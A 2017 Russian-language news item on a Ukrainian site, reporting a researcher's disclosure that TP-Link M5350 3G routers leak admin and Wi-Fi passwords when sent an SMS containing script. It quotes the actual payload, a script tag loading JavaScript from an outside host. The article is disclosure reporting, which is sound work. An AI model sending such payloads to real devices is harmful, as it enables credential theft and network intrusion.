Goodnews.ua


Уязвимость в маршрутизаторе TP-Link позволяет получить пароль по SMS

Апрель 12
16:28 2017

Уязвимость в маршрутизаторе TP-Link позволяет получить пароль по SMS

Специалист из Германии Ян Херш (Jan Hörsch) сообщил об уязвимости в маршрутизаторах производства китайской компании TP-Link, которая позволяет получить пароль к устройству путем отправки SMS-сообщения со специальным скриптом на SIM-карту маршрутизатора.

Проблема затрагивает беспроводной мобильный 3G-маршрутизатор TP-Link M5350. Как пояснил исследователь в беседе с журналистом BleepingComputer, операторы связи часто предлагают данную модель своим клиентам наряду с SIM-картой, вставляемой в маршрутизатор. Эта SIM-карта позволяет маршрутизатору подключаться к сети оператора и так же, как любая другая «симка» имеет свой номер.
В ходе анализа прошивки машрутизатора Херш выявил уязвимость в функции обработки входящих SMS-сообщений. Он выяснил, что путем отправки сообщения со скриптом < script src=//n.ms/a.js >< /script > может получить пароль к учетной записи администратора, идентификатор беспроводной сети (SSID) и пароль от сети Wi-Fi.
По словам специалиста, угроза не так опасна, как кажется на первый взгляд, поскольку для эксплуатации уязвимости злоумышленнику нужно знать номер SIM-карты маршрутизатора.

Источник: securitylab.ru

Share

Статьи по теме







0 Комментариев

Хотите быть первым?

Еще никто не комментировал данный материал.

Написать комментарий

Комментировать

Залишаючи свій коментар, пам'ятайте, що зміст та тональність вашого повідомлення можуть зачіпати почуття реальних людей, що безпосередньо чи опосередковано пов'язані із цією новиною. Виявляйте повагу та толерантність до своїх співрозмовників. Користувачі, які систематично порушують це правило, будуть заблоковані.

Website Protected by Spam Master


Останні новини

США объявили о новом пакете помощи для Украины: цифры

Читать всю статью

Ми у соцмережах




Наші партнёри

UA.TODAY - Украина Сегодня UA.TODAY
Goodnews.ua